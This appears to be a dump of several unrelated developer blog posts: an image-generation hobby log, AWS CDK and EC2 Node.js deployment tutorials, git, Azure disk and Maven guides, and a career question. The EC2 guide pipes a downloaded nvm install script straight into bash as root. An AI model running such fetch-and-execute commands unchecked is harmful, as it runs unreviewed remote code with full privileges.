I ended up with images containing all the elements of the prompt, even if very disjoint and not forming a coherent picture.

I thought this might simply be too hard a prompt for this model. So I changed the prompt again, keeping the fox but altering the rest of the prompt to be a more natural setting for the fox.

Much better. After this I got back to trying various versions of the original prompt with smaller alterations for each prompt.
### 1.2 The end
Then my laptop blue screened. I left it a short while to cool down and then started it up again; but now for some reason my python and conda setup refused to work.
During my setup I obviously fucked up some step, which left it in a state where a fresh start of the system was lacking some kind of path variable or similar.
Part of the problem is of course that I did not pay enough attention when installing my dependencies and setting up my paths etc.
To avoid this happening again, to be able to share the setup with friends and colleagues, and with my future plan of running it in the cloud in mind, I decided to get it set up in a Docker image instead. In addition to this I decided to look for a more feature complete solution, preferably with an already prepared docker setup.
### 1.3: Giving it another shot
As mentioned I wanted a more feature complete solution with an existing docker setup; and I found it [InvokeAI](https://invoke-ai.github.io/InvokeAI/).
While this probably relates more to my setup and experience, setting this up was a lot smoother compared to my initial setup: I simply had to build the image according to the instructions and run it. Suddenly I was making images with outcomes that looked like my prompt, through a provided GUI. When my laptop inevitably blue screened again from being pushed past its limit, I recovered in seconds.
But the images took longer to generate than expected and the GPU was hardly working, even when I tried to pass through GPU resources. Did this have something to do with InvokeAI, the model or my setup? After verifying the requirements I simplified the setup by using InvokeAI's simple installer version, removing potential issues with Docker (running via WSL).
I instantly got better performance and thus could figure out that something was not working as intended. With this knowledge I could debug and resolve the issue with the gpu passthrough and get back to my docker setup.
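For reference, here is a minimal sketch of what such a GPU-enabled container run can look like; the image name, tag and port are assumptions based on InvokeAI's docs, so check the documentation for your version:

```bash
# Requires the NVIDIA container toolkit for --gpus to work (also under WSL)
docker run --rm --gpus all -p 9090:9090 \
  -v invokeai-data:/invokeai \
  ghcr.io/invoke-ai/invokeai:latest
```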
After this I simply dialed in the prompt configuration to find a good balance between output and runtime by testing various combinations of prompts, cfg and steps.
When this was done I tried all of the recommended models from the invokeai installer and tried a few iterations of each to find the model(s) that I thought generated the best images for my given prompt. For some models I had to play around a bit with new baselines for cfg/steps to get images I thought looked good.
I could now generate images in bulk where some of them actually looked as intended.

### 1.4 Learnings
Some simple learnings from this:
- Always work with a recoverable / reproducable environment.
- Understand the tools (models) better when using them. Even when playing around you need to play around in a mindful manner.
- When experimenting always sanity check with a known input/output as soon as possible. It might seem more fun to have the first outcome to be what you want; but you probably want to verify your setup first.
- Image generation is just structured randomization. You will need to generate a lot of images and sort through them either manually or with image analysis to provide outcomes you're happy with. Finetuning input for your model can take a lot of iterations.
- Schedule the time for your input/model testing better than I did; generating images is a resource hog and it will make using the device for anything else at the same time a pain. Alternatively get it set up on a secondary machine asap when you know you have working setup.
## Chapter 2: To the cloud
As I now had a dockerized solution that I liked, and models and configurations that performed to my liking on my laptop, it was now time to get into the cloud. This is for multiple reasons. Amongst others it would allow for scaling above physical local devices, would not bog down said local devices during runtime and in general be better for sharing and demo purposes.
So what's on the shopping list:
- Container Hosting (potential autoscaling)
- Gpu resources for the container
- A storage volume to make outputs, models and invokeai setup stable between instances.
- Keeping costs down
To simplify the decisions I limited myself to the Azure platform as my company already had an existing setup for it.
### 2.1 Container hosting
So let's start with getting the container into the cloud; that's the minimum working solution. Getting something autoscaling would simplify maintenance and in general be resource efficient.
Starting with simple `azure container apps` would allow for Azure-handled autoscaling and some free resources monthly, which would be nice for a project of this scale. Sadly the maximum memory of Azure Container Apps, 4Gi, is way below InvokeAI's required 12GB.
I never tried how it would perform on these resources and there is the possibility to request a manual increase of memory limit.
So this is something that could be explored in the future.
Secondly, we could explore Azure's kubernetes setup, `aks`.
Sadly on the free tier there is no autoscaling, which made me opt out of this option. However neither the standard tier cluster nor the nodes are that expensive, and there are a lot of GPU supported options which might be worth trying out in another iteration in the future.
However I opted for a regular container instance. In theory there should also be cost effective K80 GPUs that could be used; however it's a preview feature which is not intended for production use and needs to be manually approved by Azure prior to usage.
Our request got rejected; hence we are running without a GPU in the cloud.
The pricing for our needs is low; 1 cpu and 12 GB memory which totals to ~$2 per day of uptime; and with mindful shutdown of the service we would of course only pay for actually active resources. And even without a gpu we can produce images in a somewhat acceptable time.
In addition to all this we will of course need a registry. This costs $0.167 / day on the basic tier.
### 2.2 Cloud storage volume
Setting up a volume mount for the container seemed pretty simple. All I needed was to set up a `file share` and mount it to my container instance.
Depending on your setup you should only need ~12GB for your models as well as extra storage for caching between steps of the image generation + generated output storage. I could not see storage going above ~25GB with some mindful cleaning of unused data. At this point pretty much any storage option would be cheap; I went for a transaction optimized setup at $0.06 per used GiB and month for the storage + $0.015 per 10000 read/writes. At this price point we should not need to worry at all.
For the first few burst tries of starting one docker container, generating one image and then killing everything, this worked fine.
I then tried sharing the volume between two different container instances and generated multiple images on both instances.
Sharing a volume worked fine and I thought that was it; I generated a few images each for a few hours straight.
Happy with the performance and results I closed them down for the day.
Next day I sanity checked my cost analysis and realized that for some reason I had an unexpectedly huge storage cost. Turns out that this also induces a network fee for the file transfers; while not immensely large, this cost about 90% of the storage cost and even 90% of the entire project at this scale of use.
Thus I decided to cut it from the project to keep costs down.
The only implication from this is that I need to reinitiate the invokeai setup for every container on startup; re-install any models I want to use and ensure to download any outputs I want to keep before shutting it down. For this type of hobby project that's perfectly fine.
When the week was up it was apparent what had happened; Azure gave me the finger.

### 2.3 Learnings
So what did I learn this time
- Start any request for potential resource needs way ahead of time; there might be a lot of forth and back and you might eventually get rejected.
- Read pricing details more closely so you understand potential extra costs in your calculations.
- When trying out things do it in iterations and inspect the outcomes after use vigilantly. Had I paid more attention the first few days the spike would never have occurred. This time the cost was just high relative to an extremely low baseline; but in any project costs can run amok if you don't pay attention.
## Outro: The outcome and next steps
After all of this I opted to keep the iteration 0 frame a simple solution: we bought a photo frame with a proprietary application for sharing images.
There are a lot of places to take this project in a second iteration; building a custom photo frame with functionality for automatically pushing newly generated images to it, training / extending a model to use the company's mascot and logos rather than generic foxes, a different cloud hosted solution with the same or a different provider, using any of the many other features InvokeAI supports like multistep workflows, or simply replacing InvokeAI with a different solution. Or maybe this is the final iteration of the project? | malcolmerikssonfoxtrot |
1,634,847 | Build serverless applications with AWS CDK | Serverless computing is becoming an increasingly popular way to develop and deploy applications.... | 0 | 2023-11-23T10:28:00 | https://blog.mikaeels.com/build-serverless-applications-with-aws-cdk | aws, awscdk, cdk, serverless |

Serverless computing is becoming an increasingly popular way to develop and deploy applications. With serverless, developers can focus on writing code and not worry about the underlying infrastructure. AWS Lambda and API Gateway are two popular AWS services used for serverless computing. In this blog post, we will explore how to use AWS CDK to deploy serverless applications using these services.
### **Getting started with AWS CDK**
Before we get into the specifics of building serverless applications, let's start with a brief introduction to AWS CDK. AWS Cloud Development Kit (CDK) is an open-source software development framework for defining cloud infrastructure in code. With AWS CDK, you can define your infrastructure in familiar programming languages such as TypeScript, Python, and Java. AWS CDK uses AWS CloudFormation under the hood, so all of your infrastructure is defined in a CloudFormation stack.
### **Creating a serverless stack**
To create a serverless stack with AWS CDK, we first need to define our resources. In this case, we will be defining an AWS Lambda function and an API Gateway endpoint. Let's start with the Lambda function:
```
import * as cdk from 'aws-cdk-lib';
import * as lambda from 'aws-cdk-lib/aws-lambda';
// In CDK v2, the Construct base class lives in the separate 'constructs' package
import { Construct } from 'constructs';

export class ServerlessStack extends cdk.Stack {
  constructor(scope: Construct, id: string, props?: cdk.StackProps) {
    super(scope, id, props);

    const myFunction = new lambda.Function(this, 'MyFunction', {
      runtime: lambda.Runtime.NODEJS_14_X,
      handler: 'index.handler',
      // Path to the directory containing your Lambda handler code
      code: lambda.Code.fromAsset('path/to/lambda/code'),
    });
  }
}
```
In this example, we are defining a new Lambda function with the runtime of Node.js 14.x. We are also specifying the location of the code for the function. This code could be located in a local directory or in an S3 bucket.
Next, we will define the API Gateway endpoint:
```
import * as cdk from 'aws-cdk-lib';
import * as lambda from 'aws-cdk-lib/aws-lambda';
// These stable apigatewayv2 module paths require a recent aws-cdk-lib release
import * as apigw from 'aws-cdk-lib/aws-apigatewayv2';
import { HttpLambdaIntegration } from 'aws-cdk-lib/aws-apigatewayv2-integrations';
import { Construct } from 'constructs';

export class ServerlessStack extends cdk.Stack {
  constructor(scope: Construct, id: string, props?: cdk.StackProps) {
    super(scope, id, props);

    const myFunction = new lambda.Function(this, 'MyFunction', {
      runtime: lambda.Runtime.NODEJS_14_X,
      handler: 'index.handler',
      code: lambda.Code.fromAsset('path/to/lambda/code'),
    });

    const api = new apigw.HttpApi(this, 'MyApi');

    api.addRoutes({
      path: '/',
      methods: [apigw.HttpMethod.GET],
      // Forward matching requests to the Lambda function
      integration: new HttpLambdaIntegration('MyIntegration', myFunction),
    });
  }
}
```
In this example, we are defining a new HTTP API Gateway endpoint that routes to our Lambda function. We are specifying that this endpoint should respond to GET requests and forward them to our Lambda function.
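As a small optional addition inside the same constructor, you can have CDK print the endpoint URL after deployment instead of looking it up in the console (the output name is just an illustration):

```
new cdk.CfnOutput(this, 'ApiUrl', {
  value: api.apiEndpoint, // the default endpoint of the HTTP API
});
```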
### **Deploying and testing your serverless application**
Once we have defined our resources, we can deploy our stack using the AWS CDK CLI:
```
cdk deploy
```
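Note: the very first CDK deployment in an account and region needs a one-time bootstrap, because assets like our Lambda code are staged in an S3 bucket that bootstrap creates:

```
cdk bootstrap
```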
The deploy command will create the necessary resources in your AWS account. Once the deployment is complete, we can test our API Gateway endpoint by sending an HTTP GET request to the endpoint URL:
```
curl https://api-gateway-url/
```
This should return the output from our Lambda function.
### **Conclusion**
In this blog post, we have seen how to use AWS CDK to define and deploy a serverless stack containing an AWS Lambda function and an API Gateway endpoint. With AWS CDK, you can define your infrastructure in code and easily manage it through version control systems and continuous integration/continuous deployment (CI/CD) pipelines. AWS CDK abstracts away the complexity of CloudFormation and provides an intuitive programming interface that makes it easy to create and manage AWS resources.
With AWS CDK, you can take advantage of the benefits of serverless computing, such as automatic scaling and pay-as-you-go pricing. AWS Lambda and API Gateway are just two of the many serverless services provided by AWS, and with AWS CDK, you can easily create and manage these services alongside other AWS services.
In summary, AWS CDK provides an excellent framework for defining and deploying serverless applications. With its intuitive programming interface and integration with AWS CloudFormation, you can easily manage your serverless infrastructure in code. By using AWS CDK, you can take advantage of the benefits of serverless computing, such as automatic scaling and pay-as-you-go pricing, and build reliable and scalable serverless applications. | mikaeelkhalid |
1,633,756 | From Code to the Cloud: A Step-by-Step Guide to Deploying Your Node.js App on AWS EC2 | Introduction In this article, we will deploy a nodejs express app to ec2. We will also add... | 0 | 2023-10-16T06:04:50 | https://dev.to/drsimplegraffiti/from-code-to-the-cloud-a-step-by-step-guide-to-deploying-your-nodejs-app-on-aws-ec2-4300 | aws, node, beginners, programming |
##### Introduction
In this article, we will deploy a nodejs express app to ec2. We will also add SSL and Nginx in the next article.
**Let's dive in** 
##### Prerequisites
🎯 AWS account
🎯 Github account
🎯 Nodejs installed on your local machine
🎯 Git installed on your local machine
🎯 Basic knowledge of nodejs and express
🎯 Basic knowledge of git
🎯 Basic knowledge of ssh
🎯 Basic knowledge of linux commands
##### ⏭️ Create a Nodejs express app
Run the following commands in your terminal
```bash
mkdir ec2
cd ec2
npm init -y
```

The `-y` flag is to skip the questions and use the default values
##### ⏭️ Install the following packages
```bash
npm install express dotenv
```
✅ Express is a web framework for nodejs
✅ Dotenv is a zero-dependency module that loads environment variables from a .env file into process.env.

##### ⏭️ Confirm the installed packages in the package.json file
✅ `package.json` is the heart💖 of npm. It holds metadata relevant to the project and it is used to give information to npm that allows it to identify the project as well as handle the project's dependencies.
```json
{
"name": "ec2",
"version": "1.0.0",
"description": "",
"main": "index.js",
"scripts": {
"test": "echo \"Error: no test specified\" && exit 1"
},
"keywords": [],
"author": "",
"license": "ISC",
"dependencies": {
"dotenv": "^16.3.1",
"express": "^4.18.2"
}
}
```
##### ⏭️ Write your start script
In essence, you can run `npm start` to start your server.

##### ⏭️ Create a .env file
This is where we will store our environment variables. The environment variables are accessible through `process.env` object. We will use the `dotenv` package to load the environment variables from the `.env` file into `process.env` object.
```bash
touch .env
```
##### ⏭️ Add the following to the .env file
```bash
PORT=2323
```
##### ⏭️ Create a .gitignore file
This is where we will add the files we don't want to push to github. Preventing the `.env` file from being pushed to github is very important because it contains sensitive information like your database credentials, api keys, etc.
```bash
touch .gitignore
```
##### ⏭️ Add the following to the .gitignore file
```bash
node_modules
.env
```
##### ⏭️ Create app.js
```javascript
require('dotenv').config(); // load environment variables from .env file
const express = require('express');
const app = express();
const port = process.env.PORT || 3000; // default port is 3000
app.get('/', (req, res) => {
return res.status(200).json({
message: 'Hello World'
});
});
app.listen(port, () => {
console.log(`Server running on port ${port}`);
});
```
##### ⏭️ Start the server
Open your terminal and run the following command
```bash
npm start
```

##### ⏭️ Curl the server
Open another terminal and run the following command
```bash
curl localhost:2323
```
You should see the following

##### ⏭️ Create a git repository
Now that we have our app running, let's create a git repository and push our code to github. Run the following commands in your terminal
```bash
git init
git add .
git commit -m "Initial commit"
```

##### ⏭️ Create a new repository on github

##### ⏭️ I choose private because I don't want this code to be public

##### ⏭️ Copy the code in the highlighted area and add to your terminal

##### ⏭️ You should see the following

---
##### ⏭️ Now lets setup our ec2 instance
Login to your aws account and go to ec2

##### ⏭️ Choose EC2 from the list of services

##### ⏭️ Choose Launch Instance

##### ⏭️ Choose Ubuntu Server 20.04 LTS (HVM), SSD Volume Type
Name your instance and click next

##### ⏭️ Create a new key pair
A key pair consists of a public key that AWS stores and a private key file that you store. Together, they allow you to connect to your instance securely.
⚠️ Ensure you note the location of the key pair

##### ⏭️ Network setting
Tick the three boxes and click next
- Allow ssh traffic: This allows you to connect to the instance using ssh
- Allow http traffic from internet: This allows you to access the instance from the browser over http (unsecure)
- Allow https traffic from internet: This allows you to access the instance from the browser over https (secure)

##### ⏭️ Review and launch

##### ⏭️ Success
We have successfully created our ec2 instance. Click on the instance highlighted in green to view the details

##### ⏭️ Click on the instance Id to view the details

##### ⏭️ Connecting to the ec2 instance using ssh
There are two ways to connect to the ec2 instance using ssh. You can either use the **browser** or use the **terminal**.
_Method 1:_ Using the browser
Click on connect and follow the instructions

##### ⏭️ Click the connect button

##### ⏭️ Change to root user
- Sudo: Super User Do; allows a user with proper permissions to execute a command as another user, such as the superuser.
- su: Switch User; allows you to switch to another user account without logging out of your current terminal session.
- the `-` flag starts a login shell, so you take on the target user's environment (paths, home directory) instead of keeping your current one

##### ⏭️ Install nvm
nvm is a version manager for nodejs. It allows you to install multiple versions of nodejs and switch between them easily.
```
curl -o- https://raw.githubusercontent.com/nvm-sh/nvm/v0.34.0/install.sh | bash
```
##### ⏭️ Activate nvm
We need to activate nvm so that we can use it in the current terminal session
```
. ~/.nvm/nvm.sh
```
##### ⏭️ Install node
Install the latest version of node using nvm
```
nvm install node
```

##### ⏭️ Install git
Git is need to clone the repo we created earlier
```
sudo apt-get update -y
sudo apt-get install git -y
```
⚠️ You can omit the sudo since you are already root. So just run
```
apt-get update -y
apt-get install git -y
```
##### ⏭️ Check if node is installed
We have the latest version of node installed
```
node -v
```

##### ⏭️ Check if git is installed
```
git --version
```

##### ⏭️ Clone the repo we created earlier using ssh
```
git clone git@github.com:drsimplegraffiti/ec2-deploy.git
```
You should get this error because you have not added your ssh key to github

##### ⏭️ Connect github ssh key to ec2 instance
Generate a fingerprint for the ssh key
```bash
ssh-keygen -t ed25519 -C "your email"
```

Click enter thrice and leave the passphrase empty as default. You can add a passphrase if you want to add an extra layer of security.
##### ⏭️ eval the ssh-agent
eval is used to start the ssh-agent in the current terminal session. The ssh-agent is a program that runs in the background and stores your ssh keys. It is used to authenticate you to remote servers without having to type your key's passphrase every time.
```bash
eval "$(ssh-agent -s)"
```

##### ⏭️ Add the ssh key to the ssh-agent

##### ⏭️ Copy the ssh key to the clipboard
```bash
cat ~/.ssh/id_ed25519.pub
```

##### ⏭️ Paste the ssh key to github
Go to github settings -> SSH and GPG keys -> New SSH key
Paste the key and save. Authenticate with your GitHub password or the GitHub mobile app


##### ⏭️ Test the connection
Add GitHub's host key to your known_hosts file:
```bash
ssh-keyscan github.com >> ~/.ssh/known_hosts
```
Let's test the connection to github in the ec2 instance terminal
```bash
ssh -T git@github.com
```

##### ⏭️ Clone the repo again
This time, we should be able to clone the repo without any error
```bash
git clone git@github.com:drsimplegraffiti/ec2-deploy.git
```

##### ⏭️ List the files in the directory
```bash
ls -la
```
You should see the ec2-deploy folder

cd into the ec2-deploy
- cd - change directory
##### ⏭️ See the files in the ec2-deploy folder
```bash
ls -la
```

##### ⏭️ Install dependencies
```bash
cd ec2-deploy
npm install
```

##### ⏭️ Start the server
```bash
npm start
```
We got port 3000 because the .env file is listed in .gitignore, so it was never pushed to GitHub. It therefore doesn't exist on the server, and the app falls back to the default port.

💡 You can also use pm2 to start the server if you want to keep the server running even after you close the terminal
Install pm2 globally
```bash
npm install pm2 -g
```

##### ⏭️ Start the server with pm2
```bash
pm2 start app.js
```

##### ⏭️ Pick the ip address of the ec2 instance and curl it

YAAY! We have our server running on ec2 mapped to this ip address 🎉🎉🎉. However it is not secure because it is running on http. We will add SSL and Nginx in the next article.

##### ⏭️ Method 2: Connecting to the ec2 instance using ssh from your local machine
Click connect from your instance -> connect -> ssh client -> copy the ssh command

##### ⏭️ Open your terminal and cd into the directory where you saved the key pair
```bash
cd Downloads
```
##### Run the ssh command
```bash
ssh -i "devtokey.pem" ubuntu@ec2-35-175-174-169.compute-1.amazonaws.com
```
##### ⏭️ You will get this warning
This warning is related to permissions. We need to change the permissions of the key pair. We will do that in the next step

##### ⏭️ Chmod the key pair
Chmod is a command in Linux and other Unix-like operating systems that allows you to change the permissions (or access mode) of a file or directory.
```bash
chmod 400 devtokey.pem
```
⚙️ 400 - read only by owner
⚙️ 600 - read and write by owner
##### ⏭️ Run the ssh command again
```bash
ssh -i "devtokey.pem" ubuntu@ec2-35-175-174-169.compute-1.amazonaws.com
```
##### ⏭️ You should see the following

##### ⏭️ Start the server
```bash
cd ec2-deploy
pm2 start app.js
```

You should get a "script already running" message because we already started the server earlier in the browser-based session. Stop it by running
```bash
pm2 stop app.js
```
or
```bash
pm2 stop 0 # 0 is the id of the script referencing app.js
```

##### ⏭️ Start the server again
```bash
pm2 start app.js
```

##### ⏭️ Check the ec2 ip by running
```bash
curl ifconfig.me
```
##### ⏭️ Pick the ip address of the ec2 instance and curl it

##### ⏭️ Open another terminal and curl the ip address
```bash
curl 35.175.174.169
```
🎉🎉🎉 We have connected to our ec2 instance using ssh from our local machine.

##### Conclusion
We have successfully deployed our nodejs express app to ec2. We will add SSL and Nginx in the next article. Thanks for reading. Please leave a comment if you have any questions or suggestions.
 | drsimplegraffiti |
1,634,284 | Sloan's Inbox: Considering a career change from coding to graphic design, any advice? | Hey friends! Sloan, DEV Moderator and resident mascot, back with another question submitted by a DEV... | 22,731 | 2023-10-26T16:00:00 | https://dev.to/devteam/sloans-inbox-considering-a-career-change-from-coding-to-graphic-design-any-advice-565n | discuss, career, design | Hey friends! Sloan, DEV Moderator and resident mascot, back with another question submitted by a DEV community member. 🦥
For those unfamiliar with the series, this is another installment of Sloan's Inbox. You all send in your questions, I ask them on your behalf anonymously, and the community leaves comments to offer advice. Whether it's career development, office politics, industry trends, or improving technical skills, we cover all sorts of topics here. If you want to send in a question or talking point to be shared anonymously via Sloan, that'd be great; just scroll down to the bottom of the post for details on how.
Let's see what we have for this week...
### Today's question is:
> I've been coding for a good while now and am feeling ready for a change. I'm interested in graphic design and am curious if anybody else has made a similar move before? Any advice on how to approach this change, market myself, and anything else that comes to mind would be very much appreciated. 😀
>
Share your thoughts and let's help a fellow DEV member out! Remember to keep kind and stay classy. 💚
---
*Want to submit a question for discussion or ask for advice? [Visit Sloan's Inbox](https://docs.google.com/forms/d/e/1FAIpQLSc6wgzJ1hh2OR4WsWlJN9WHUJ8jV4dFkRDF2TUP32urHSAsQg/viewform)! You can choose to remain anonymous.* | sloan |
1,634,330 | GIT Merge Conflict | How to Resolve Git Merge Conflicts Hello, Upon completion of my journey as a beginner software... | 0 | 2023-10-13T23:28:26 | https://dev.to/zdededg97/git-merge-conflict-3ig3 | github, merge, beginners |
**How to Resolve Git Merge Conflicts**
Hello! Early in my journey as a beginner software developer, like many before me, I encountered the seemingly daunting world of Git merge conflicts. At first, it felt overwhelming, but guess what? It wasn't as scary as it sounded! Let me share my experience with you.
**What's a Merge Conflict?**
I used to think that merging in Git would always be smooth sailing. But no! A merge conflict is what happens when you and someone else (or even you in the past) make different changes to the same part of a file, and Git throws its hands up, saying, "I can't decide for you!"
**Steps to Navigating Merge Conflicts**
**Understanding the Problem**: The first time Git said there was a conflict, I was puzzled. But reading the error message gave me clues.
**Finding the Culprit**: Opening the troubled file, I saw strange markings like:

**Making Decisions**: This was a "choose your adventure" moment.
I could either keep my changes.
Adopt the changes from the other branch.
Or even mix and match, taking some from both.
**Saving the Day**: After deciding which parts to keep, I removed those markers and saved the file. Then, feeling like a superhero, I ran `git add <file>` followed by `git commit`.
**Onwards**!: And with that, I could continue my Git journey, merging, rebasing, and collaborating like a pro!
**Tips for Fellow Beginners**
- Keep Calm: It's just a hurdle, not a wall. You can get past it!
- Ask for Help: Don't hesitate to ask a friend or coworker. We all learn from each other!
- Practice Makes Perfect: The more you deal with conflicts, the better you become at resolving them.
**In Conclusion**
Starting as a software developer can be both thrilling and filled with challenges. Merge conflicts were one such challenge for me, but with patience and a bit of practice, I turned them into just another step in my coding journey. If I can do it, so can you! 💪 | zdededg97 |
1,634,557 | Determining the Ideal Length of a Research Paper: Guidelines and Considerations | The length of a research paper is a critical aspect of academic writing, and it often leaves students... | 0 | 2023-10-14T09:30:39 | https://dev.to/mikkejames/determining-the-ideal-length-of-a-research-paper-guidelines-and-considerations-o47 |
The length of a research paper is a critical aspect of academic writing, and it often leaves students and researchers pondering questions such as, "[How long should a research paper be](https://studyfy.com/blog/how-long-should-a-research-paper-be)?" and "What is the optimal length for each section?"
> The answer to these questions is not set in stone and can vary depending on multiple factors. In this article, we will explore the key elements to consider when determining the length of your [research paper](https://studyfy.com/service/research-paper-writing-service) and provide insights into crafting effective introductions and conclusions.
1. The Standard Length of a Research Paper
Typically, research papers run around 4,000–6,000 words, but it's common to see short papers around 2,000 words or long papers exceeding 10,000 words. The variation in length is influenced by the specific requirements of the research project, the field of study, and the publication venue. If you're writing a paper for school, the recommended length should be provided in the assignment instructions.
2. Factors Influencing Length
a. Purpose and Scope of the Research
The primary factor determining the length of a research paper is the purpose and scope of the study. A comprehensive investigation into a complex topic will naturally require a longer paper, while a narrow and focused research question may lead to a shorter document. Consider the depth and breadth of your topic when deciding on the length.
b. Publication Guidelines
If you intend to submit your research paper to a journal or conference, it's crucial to adhere to their specific guidelines regarding paper length. Journals in different fields may have varying expectations, so always check their submission requirements.
c. Audience
Think about your target audience when determining the length of your research paper. Are you writing for experts in your field who may require an in-depth analysis, or is your audience more general, necessitating a concise and easily digestible presentation?
d. Depth of Analysis
A critical factor affecting length is the depth of analysis required to address your research question. Some topics demand extensive literature reviews, complex methodologies, and detailed discussions, while others may be more straightforward and concise.
3. Crafting an Effective Introduction
The introduction of a research paper serves as the roadmap for your readers, setting the stage for what's to come. But how long should an introduction be? While there is no fixed word count, a general guideline is that introductions typically make up 10-15% of the total paper length.
When writing your introduction:
- Provide context: Explain the significance of the topic and its relevance to your field of study or the broader world.
- State your research question or thesis: Clearly articulate what you aim to achieve in your paper.
- Outline your methodology: Briefly describe the research methods and approach you used.
- Preview the structure: Give readers a glimpse of the sections or key points they can expect in the paper.
4. Crafting an Effective Conclusion
The conclusion is your opportunity to summarize your findings, restate your thesis, and leave a lasting impression on your readers. Like the introduction, the length of the conclusion should be proportionate to the overall paper, usually comprising 10-15% of the total length.
In your conclusion:
- Summarize key findings: Provide a concise summary of your research results and their implications.
- Restate your thesis: Reaffirm the main argument or research question and highlight its significance.
- Offer recommendations: Suggest future research directions or practical applications of your findings.
- End on a strong note: Craft a memorable closing statement that leaves a lasting impact on your readers.
5. Conclusion
In summary, the ideal length of a research paper varies depending on several factors, including the purpose and scope of the study, publication guidelines, audience, and depth of analysis. When crafting your research paper, always consider these factors and aim for a balanced and coherent presentation of your research. Whether your paper is shorter or longer than the typical range of 4,000–6,000 words, what matters most is the clarity, relevance, and depth of your content. | mikkejames | |
1,634,705 | 1. Hello World! | Nice to meet you! Happy to have finally signed up to DEV. My name is Manoj Kumar, a beginner... | 0 | 2023-10-14T13:35:45 | https://dev.to/emanoj/1-hello-world-3bin | Nice to meet you!
Happy to have finally signed up to DEV.
My name is Manoj Kumar, a beginner student in coding. A very late starter in this field but I hope I can study and use it well. Not hiding the fact that I am nervous: _will I understand the subject matter? Will I be good at it? Will I enjoy it?_
I am working on a few personal and bootstrapped ventures like [austartups](https://austartups.au/?target=_blank), [come up with a name](https://comeupwithaname.com), [nifty zippy web](https://niftyzippyweb.com), and a few more coming up soon. All of these ideas and watching other people build their ideas inspired me to study coding. [Twitter](https://twitter.com/emanoj_) has been a great place to watch founders build-in-public and come across so many creative apps.
My course is a 10-month bootcamp program, starting October 2023. Patience and practice are the key, and I look forward to being inspired and helped by all of you. Hence, I am here.
I am planning to chronicle my studies at [Hashnode](https://emanoj.hashnode.dev) and wondering how to use DEV as well. I could duplicate the content but Google won't be happy. Perhaps, I should write about something very technical. Let's see.
Anyway, for now, I just wanted to say, "**Hi**" and get the ball rolling here. Can't wait to meet so many of you here! | emanoj | |
1,634,858 | ADD A DISK, INITIALIZE IT AND MAKE IT USEABLE IN AZURE | Step 1: After you have launched your virtual machine, come back to your Azure portal and click on... | 0 | 2023-10-14T16:08:34 | https://dev.to/jeffderick/how-to-add-a-disk-initialize-it-and-make-it-useable-55ac | devops, azure, beginners, cloudcomputing | **Step 1:** After you have launched your virtual machine, come back to your Azure portal and click on **DISK**

**Step 2:** Scroll down and click on **create and attach a new disk**

**Step 3:** A new pop-up shows just below it. Fill in the details: your disk name, the storage type you want, and the size of the disk you want to create.

**Step 4:** Connect back to your virtual machine

**Step 5:** After your virtual machine is done loading, go to the search bar and search for **Disk management** and click on **Create and format hard disk partition**

**Step 6:** A new tab opens up. Scroll down and you will see **Disk 2**; right-click on it and click **New Simple Volume**.

**Step 7:** Follow the installation process by clicking **Next**

**Step 8:** When you get to the **Format partition** tab, you select how you want your disk to be formatted

**Step 9:** You click on **Finish** and you are done

To check if the disk is installed and ready to use, go to **This PC** on your system, you will see it mounted.

- Note: You can give your disk a name when you are formatting it. Mine is showing **New Volume** because I skipped that step.
1,635,120 | Maven on Java 21 and Devuan 5 (Debian 12): Install manually | Summary Apache Maven is a popular open source software to build and manage projects of... | 25,038 | 2023-10-15T04:00:17 | https://scqr.net/en/blog/2023/10/15/maven-on-java-21-and-devuan-5-debian-12-install-manually/index.html | maven, java, openjdk, devuan | ## Summary
[Apache](https://apache.org/) [Maven](https://maven.apache.org/) is a popular open source software to build and manage projects of [Java](https://dev.java/) (and also other programming languages), licensed under [Apache-2.0](https://www.apache.org/licenses/LICENSE-2.0).
With [Devuan](https://www.devuan.org/) [5 Daedalus](https://www.devuan.org/os/announce/daedalus-release-announce-2023-08-14) based on [Debian](https://www.debian.org/) [12 bookworm](https://www.debian.org/releases/bookworm/), it is easy to use it thanks to [their packages management](https://packages.debian.org/bookworm/). However, it is not always the latest. In fact, the Maven version Debian 12 currently offers is [3.8](https://maven.apache.org/docs/3.8.1/release-notes.html) rather than [3.9](https://maven.apache.org/docs/3.9.0/release-notes.html). Well, is that a big problem? Probably not.
In [my previous post](https://scqr.net/en/blog/2023/10/14/java-21-on-devuan-5-debian-12-install-manually/index.html), I installed [OpenJDK](https://openjdk.org/) [21](https://jdk.java.net/21/), the latest, manually on Devuan 5. Here, I will show how to install Maven manually, too.
Of course, it is easier to run `apt install maven` 🫣
### Environment
- OS: Devuan 5 Daedalus
- based on Debian 12
- App Engine: OpenJDK 21
- Project Build and Management: Apache Maven [3.9.5](https://maven.apache.org/docs/3.9.5/release-notes.html)
## Tutorial
Suppose that your `PATH` includes Java 21 `bin` which appears before those of other Java versions such as 17 (the previous LTS).
### Get Apache Maven package
Visit: https://maven.apache.org/download.cgi
Get the binary with the command line, for example:
```console
$ curl -LO https://dlcdn.apache.org/maven/maven-3/3.9.5/binaries/apache-maven-3.9.5-bin.tar.gz
```
You can verify the download by comparing the checksums between the server and the local. Use the command lines below, for example:
```console
$ echo "$(curl -s https://downloads.apache.org/maven/maven-3/3.9.5/binaries/apache-maven-3.9.5-bin.tar.gz.sha512) apache-maven-3.9.5-bin.tar.gz" | \
sha512sum -c
apache-maven-3.9.5-bin.tar.gz: OK
```
This confirms that the server checksum matches the local one:
```console
$ # checksum of the downloaded file
$ sha512sum apache-maven-3.9.5-bin.tar.gz
4810523ba025104106567d8a15a8aa19db35068c8c8be19e30b219a1d7e83bcab96124bf86dc424b1cd3c5edba25d69ec0b31751c136f88975d15406cab3842b apache-maven-3.9.5-bin.tar.gz
```
### Place files
Extract it:
```console
$ tar xzf apache-maven-3.9.5-bin.tar.gz
```
The result is as below:
```console
$ ls {.,apache-maven-3.9.5}
.:
apache-maven-3.9.5/ apache-maven-3.9.5-bin.tar.gz
(...)
apache-maven-3.9.5:
bin/ boot/ conf/ lib/ LICENSE NOTICE README.txt
```
Now you have `apache-maven-3.9.5` directory which contains `bin` etc. 👍
### Set environment variables
Update `PATH` to include Maven `bin`:
```console
$ # case bash
$ export PATH=$(readlink -f ./apache-maven-3.9.5/bin):$PATH
$ # case fish
$ #set -x PATH $(readlink -f ./apache-maven-3.9.5/bin/):$PATH
```
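Note that this only affects the current shell session. To make the change permanent, you could append it to your shell profile, for example (assuming you extracted the archive into your home directory):

```console
$ # case bash: persist the PATH update
$ echo 'export PATH="$HOME/apache-maven-3.9.5/bin:$PATH"' >> ~/.bashrc
```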
## Conclusion
